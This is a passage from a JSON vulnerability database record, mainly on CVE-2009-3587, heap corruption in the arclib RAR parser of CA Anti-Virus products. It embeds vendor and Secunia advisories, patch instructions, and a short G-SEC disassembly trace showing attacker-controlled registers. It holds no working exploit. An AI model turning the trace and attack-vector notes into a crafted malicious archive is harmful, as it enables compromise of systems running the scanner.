"id": "CVE-2007-3334"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2007-06-26T20:06:58",
"db": "PACKETSTORM",
"id": "57276"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"date": "2007-06-21T22:30:00",
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "eTrust Secure Content Manager including CA Used in products Ingres Database Server For Communications Server Heap-based buffer overflow vulnerability in components",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
}
}
VAR-200910-0352
Vulnerability from variot - Updated: 2025-04-10 20:51Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted RAR archive file that triggers heap corruption, a different vulnerability than CVE-2009-3588. This vulnerability CVE-2009-3588 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) Could be put into a state or execute arbitrary code. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. An attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. The issues affect the Anti-Virus engine with versions prior to 'arclib' 8.1.4.0. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA20091008-01: Security Notice for CA Anti-Virus Engine
Issued: October 8, 2009
CA's support is alerting customers to multiple security risks associated with CA Anti-Virus Engine. Vulnerabilities exist in the arclib component that can allow a remote attacker to cause a denial of service, or to cause heap corruption and potentially further compromise a system. CA has issued fixes to address the vulnerabilities. An attacker can create a malformed RAR archive file that results in heap corruption and allows the attacker to cause a denial of service or possibly further compromise the system. An attacker can create a malformed RAR archive file that results in stack corruption and allows the attacker to cause a denial of service.
Risk Rating
Medium
Platform
Windows UNIX Linux Solaris Mac OS X Netware
Affected Products
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1 CA Anti-Virus 2007 (v8) CA Anti-Virus 2008 CA Anti-Virus 2009 CA Anti-Virus Plus 2009 eTrust EZ Antivirus r7.1 CA Internet Security Suite 2007 (v3) CA Internet Security Suite 2008 CA Internet Security Suite Plus 2008 CA Internet Security Suite Plus 2009 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) 8.1 CA Threat Manager Total Defense CA Gateway Security r8.1 CA Protection Suites r2 CA Protection Suites r3 CA Protection Suites r3.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 1.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1 CA ARCserve Backup r11.5 on Windows CA ARCserve Backup r12 on Windows CA ARCserve Backup r12.0 SP1 on Windows CA ARCserve Backup r12.0 SP 2 on Windows CA ARCserve Backup r12.5 on Windows CA ARCserve Backup r11.1 Linux CA ARCserve Backup r11.5 Linux CA ARCserve for Windows Client Agent CA ARCserve for Windows Server component CA eTrust Intrusion Detection 2.0 SP1 CA eTrust Intrusion Detection 3.0 CA eTrust Intrusion Detection 3.0 SP1 CA Common Services (CCS) r3.1 CA Common Services (CCS) r11 CA Common Services (CCS) r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK) CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
Non-Affected Products
CA Anti-Virus engine with arclib version 8.1.4.0 or later installed
How to determine if the installation is affected
For products on Windows:
- Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
- Right click on the file and select Properties.
- Select the Version tab.
-
If the file version is earlier than indicated below, the installation is vulnerable.
File Name File Version arclib.dll 8.1.4.0
*For eTrust Intrusion Detection 2.0, the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in "Program Files\CA\Intrusion Detection\Common".
For CA Anti-Virus r8.1 on non-Windows platforms:
Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 8.1.4.0, the installation is vulnerable.
Example compver utility output:
------------------------------------------------
COMPONENT NAME VERSION
------------------------------------------------
eTrust Antivirus Arclib Archive Library 8.1.4.0
... (followed by other components)
For reference, the following are file names for arclib on non-Windows operating systems:
Operating System File name
Solaris libarclib.so
Linux libarclib.so
Mac OS X arclib.bundle
Solution
CA released arclib 8.1.4.0 on August 12 2009. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1: apply fix # RO11964.
CA Common Services (CCS) r3.1: apply fix # RO11954.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 32bit: apply fix # RO10663.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 IA64: apply fix # RO10664.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 AMD64: apply fix # RO10665.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r1.1: apply fix # RO10999.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r8.0: apply fix # RO10999.
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: apply fix # RO11000.
CA Gateway Security r8.1: RO10999.
CA ARCserve for Windows Server component installed on a 64 bit machine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Server component installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Windows Client Agent installed on a 64 bit machine: apply fix # RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Client Agent installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Linux Server r11.5: apply fix # RO10729.
CA ARCserve for Linux:
-
Download RO10729.tar.Z from RO10729 into a temporary location /tmp/RO10729
-
Uncompress and untar RO10729.tar.Z as follows: uncompress RO10729.tar.Z tar -xvf RO10729.tar The new "libarclib.so" will be extracted to /tmp/RO10729
-
Change the directory to $CAIGLBL0000/ino/config as follows: cd $CAIGLBL0000/ino/config
-
Rename "libarclib.so" to "libarclib.so.RO10729" as follows: mv libarclib.so libarclib.so.RO10729
-
Copy the new libarclib.so as follows: cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/
-
chmod +x $CAIGLBL0000/ino/config/libarclib.so
-
Stop the common agent (caagent stop)
-
Change the directory to ARCserve common agent directory (typically /opt/CA/BABcmagt) cd /opt/CA/BABcmagt Note: To find out the agent home directory run the following command: dirname 'ls -l /usr/bin/caagent |cut -f2 -d">"'
-
Save a copy of libarclib.so cp -p libarclib.so libarclib.so.RO10729
-
Copy over the new libarclib.so as follows: cp $/tmp/RO10729/libarclib.so.
-
Start the common agent (caagent start)
-
Repeat steps (7-11) on all remote Linux client agents' installations.
-
rm -rf /tmp/RO10729
Workaround
Do not open email attachments or download files from untrusted sources.
If additional information is required, please contact CA Support at http://support.ca.com/.
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams, Director ; 0xE2941985 CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability intelligence source on the market.
Implement it through Secunia.
For more information visit: http://secunia.com/advisories/business_solutions/
Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com
TITLE: CA Anti-Virus Engine RAR Processing Two Vulnerabilities
SECUNIA ADVISORY ID: SA36976
VERIFY ADVISORY: http://secunia.com/advisories/36976/
DESCRIPTION: Two vulnerabilities have been reported in multiple CA products, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise a vulnerable system.
Successful exploitation may allow execution of arbitrary code.
Please see the vendor's advisory for detailed instructions on applying patches.
PROVIDED AND/OR DISCOVERED BY: The vendor credits Thierry Zoller.
ORIGINAL ADVISORY: CA20091008-01: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Background ~~~~~~~~~~~~~ Quote: "CA is one of the world's largest IT management software providers. We serve more than 99% of Fortune 1000 companies, as well as government entities, educational institutions and thousands of other companies in diverse industries worldwide"
"CA Anti-Virus for the Enterprise is the next generation in comprehensive anti-virus security for business PCs, servers and PDAs. It combines proactive protection against malware with new, powerful management features that stop and remove malicious code before it enters your network, reducing system downtime"
II.
Attacker has control over EBX :
Basic Block: 6e4305b0 mov cl,byte ptr [ebx] Tainted Input Operands: ebx 6e4305b2 add edi,28h 6e4305b5 push edi 6e4305b6 lea edx,[esp+14h] 6e4305ba mov byte ptr [esp+14h],cl Tainted Input Operands: cl 6e4305be inc ebx Tainted Input Operands: ebx 6e4305bf push edx 6e4305c0 mov ecx,esi 6e4305c2 mov dword ptr [esp+1ch],ebx Tainted Input Operands: ebx 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)
III. Due to the nature of Anti-virus products, the attack vectors can be near endless. An attack could be done over the way of an E-mail message carrying an RAR attachment (of a file recognised as being RAR), USB, CD, Network data etc.
Please note that this is a general problem and not exclusive to Computer Associates.
IV. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~~ DD.MM.YYYY 11.05.2009 - Reported CVE-2009-3587 03.06.2009 - Reported CVE-2009-3588 09.10.2009 - CA releases advisory https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878 13.10.2009 - G-SEC releases advisory
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200910-0352",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus plus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "2009"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3.1"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r8"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r2"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3"
},
{
"model": "internet security suite plus 2008",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite plus 2009",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"model": "threat manager total defense",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.5"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "arcserve for windows client agent",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite plus 2009",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r7.1"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"model": "threat manager total defense",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "gateway security",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "arcserve for windows server component",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2009"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "etrust anti-virus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.1"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "anti-virus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.1"
},
{
"model": "internet security suite plus 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.1"
},
{
"model": "anti-virus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus gateway",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus sdk",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows client agent",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows server component",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust intrusion detection",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "gateway security",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust ez antivirus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates threat manager total defense",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates threat manager for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates threat manager for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"model": "associates brightstor arcserve backup r12.0 windows sp1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
}
],
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:etrust_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_plus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_sdk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_backup",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_for_windows_client_agent",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_for_windows_server_component",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:common_services",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_intrusion_detection",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:gateway_security",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite_plus_2008",
"vulnerable": true
},
{
